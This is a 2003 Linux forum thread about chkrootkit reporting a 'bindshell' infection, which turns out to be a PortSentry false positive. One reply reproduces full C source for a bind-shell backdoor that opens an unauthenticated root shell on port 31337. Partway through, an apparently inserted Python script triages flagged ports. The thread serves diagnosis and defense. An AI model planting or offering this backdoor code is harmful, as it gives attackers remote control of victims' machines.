Gent n00b
Joined: 24 May 2003 Posts: 6
Posted: Wed May 28, 2003 2:03 am Post subject: Hacked Maybe???
I'll admit that I don't know that much about security, though I am trying to learn more. I recently installed chkrootkit mainly because I was just curious. When I ran it I came across this:
Code:
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not infected
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not found
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/.keep /usr/lib/perl5/5.8.0/i586-linux/auto/ExtUtils/MakeMaker/.packlist /usr/lib/perl5/5.8.0/i586-linux/auto/Safe/.packlist /usr/lib/perl5/5.8.0/i586-linux/.packlist /usr/lib/perl5/site_perl/5.8.0/i586-linux/auto/Net/SSLeay/.packlist /usr/lib/twin/.twinrc /usr/lib/twin/.twenvrc.sh /lib/.keep /lib/dev-state/.keep
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... nothing found
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... INFECTED (PORTS: 1524 31337)
Checking `lkm'... nothing detected
Checking `rexedcs'... not found
Checking `sniffer'...
eth0 is not promisc
eth1 is not promisc
Checking `wted'... nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'...
nothing deleted
Just what exactly is bindshell anyway, and what does it mean that it is infected?
dma Guru
Joined: 31 Jan 2003 Posts: 437 Location: Charlotte, NC, USA
Posted: Wed May 28, 2003 2:29 am Post subject:
Here's "bindshell" (bind a shell to a port):
http://home.tiscali.be/tusca/intru2/grp6/bindshell.html
Code:
/* quick thingy... bind a shell to a socket... defaults to port 31337 */
/* code by pluvius@io.org */
/* don't forget.. when you connect to the port.. commands are like: */
/* "ls -l;" or "exit;" (don't forget the ';') */
#define PORT 31337
#include
#include
#include
#include
#include
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int main ()
{
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
(they removed the #include filenames to prevent kiddie abuse.)
This is *BAD NEWS*. Find out which user is running it, possibly using:
or:
Code:
netstat -epl -A inet
(although this won't work if they replaced netstat/lsof or loaded a kernel module that hides the connections.)
Find out where the bindshell is located and who owns the bindshell file. Try to determine when it was planted. If it is running as root then you might want to rebuild from scratch. YOU CAN'T TRUST ANYTHING.
Gent n00b
Joined: 24 May 2003 Posts: 6
Posted: Wed May 28, 2003 2:44 am Post subject:
Output from
Code:
netstat -epl -A inet
Code:
tcp 0 0 *:31337 *:* LISTEN root 3699 2146/portsentry
udp 0 0 *:31337 *:* root 3755 2148/portsentry
dma Guru
Joined: 31 Jan 2003 Posts: 437 Location: Charlotte, NC, USA
Posted: Wed May 28, 2003 2:57 am Post subject:
http://www.chkrootkit.org/
Look at #7:
Quote:
7. I'm running PortSentry/klaxon. What's wrong with the bindshell test?
If you're running PortSentry/klaxon or another program that binds itself to unused ports probably chkrootkit will give you a false positive on the bindshell test (ports 114/tcp, 465/tcp, 511/tcp, 1008/tcp, 1524/tcp, 1999/tcp, 3879/tcp, 4369/tcp, 5665/tcp, 10008/tcp, 12321/tcp, 23132/tcp, 27374/tcp, 29364/tcp, 31336/tcp, 31337/tcp, 45454/tcp, 47017/tcp, 47889/tcp, 60001/tcp).
You seem to be safe (so long as portsentry isn't compromised).
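To make dma's advice concrete (map every port chkrootkit flags to the user and program actually holding it, and treat PortSentry as the documented false positive rather than a compromise), here is an added Python example that is not part of this thread. It parses `netstat -epl -A inet` output of the form Gent posted; the port list comes from the chkrootkit FAQ quoted above, and the sample rows beyond the two portsentry lines are constructed (the `sh` listener on 1999 is a made-up contrast case, not something from the thread).

```python
import re
# Ports chkrootkit's bindshell test probes (list from the chkrootkit FAQ quoted above).
BINDSHELL_PORTS = {114, 465, 511, 1008, 1524, 1999, 3879, 4369, 5665, 10008, 12321,
                   23132, 27374, 29364, 31336, 31337, 45454, 47017, 47889, 60001}
# Programs that bind decoy ports on purpose; anything else on a flagged port is suspect.
KNOWN_DECOYS = {"portsentry", "klaxon"}

# One `netstat -epl -A inet` row: proto recv send local foreign [state] user inode pid/prog
ROW = re.compile(r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+"
                 r"(?:[A-Z_]+\s+)?(?P<user>\S+)\s+\d+\s+(?P<pidprog>\S+)")

def parse_netstat(text):
    """Yield {proto, port, user, prog} per socket row; header lines are skipped."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        port = m.group("local").rsplit(":", 1)[-1]        # "*:31337" -> "31337"
        pid, _, prog = m.group("pidprog").partition("/")  # "2146/portsentry" or "-"
        yield {"proto": m.group("proto"), "user": m.group("user"),
               "port": int(port) if port.isdigit() else None,   # names like "ssh" -> None
               "prog": prog or None}

def triage(netstat_text, flagged=BINDSHELL_PORTS):
    """Classify each socket on a flagged port: 'decoy' (PortSentry/klaxon, the documented
    false positive), 'hidden' (owner not shown: rerun as root, or netstat itself may be
    trojaned) or 'investigate' (any other program on the port, dma's *BAD NEWS* case)."""
    out = []
    for s in parse_netstat(netstat_text):
        if s["port"] not in flagged:
            continue
        verdict = ("hidden" if s["prog"] is None
                   else "decoy" if s["prog"] in KNOWN_DECOYS else "investigate")
        out.append((s["proto"], s["port"], s["user"], s["prog"], verdict))
    return out

# Constructed sample: the two portsentry rows from the thread, an sshd row chkrootkit
# ignores, an ownerless row on 1524 and a made-up /bin/sh listener on 1999 for contrast.
SAMPLE = """\
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name
tcp 0 0 *:31337 *:* LISTEN root 3699 2146/portsentry
udp 0 0 *:31337 *:* root 3755 2148/portsentry
tcp 0 0 *:ssh *:* LISTEN root 1201 987/sshd
tcp 0 0 *:1524 *:* LISTEN nobody 5120 -
tcp 0 0 *:1999 *:* LISTEN nobody 5121 4321/sh
"""
if __name__ == "__main__":
    for proto, port, user, prog, verdict in triage(SAMPLE):
        print(f"{proto}/{port}\tuser={user}\tprog={prog or '?'}\t-> {verdict}")
```

A 'decoy' verdict still rests on the portsentry binary being trustworthy, which is dma's caveat; a 'hidden' or 'investigate' verdict is where the file-owner and timestamp checks above start.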
Gent n00b
Joined: 24 May 2003 Posts: 6
Posted: Wed May 28, 2003 2:59 am Post subject:
Well, I just did a search for bindshell and nothing came back. I'm just wondering if portsentry is supposed to do this.
Gent n00b
Joined: 24 May 2003 Posts: 6
Posted: Wed May 28, 2003 3:03 am Post subject:
Well, I just got through with a search on the Net and found that when you run PortSentry, chkrootkit will give a false alert. In the future I'll know to ignore this, or at least not jump to conclusions. Anyways, thanks for the help.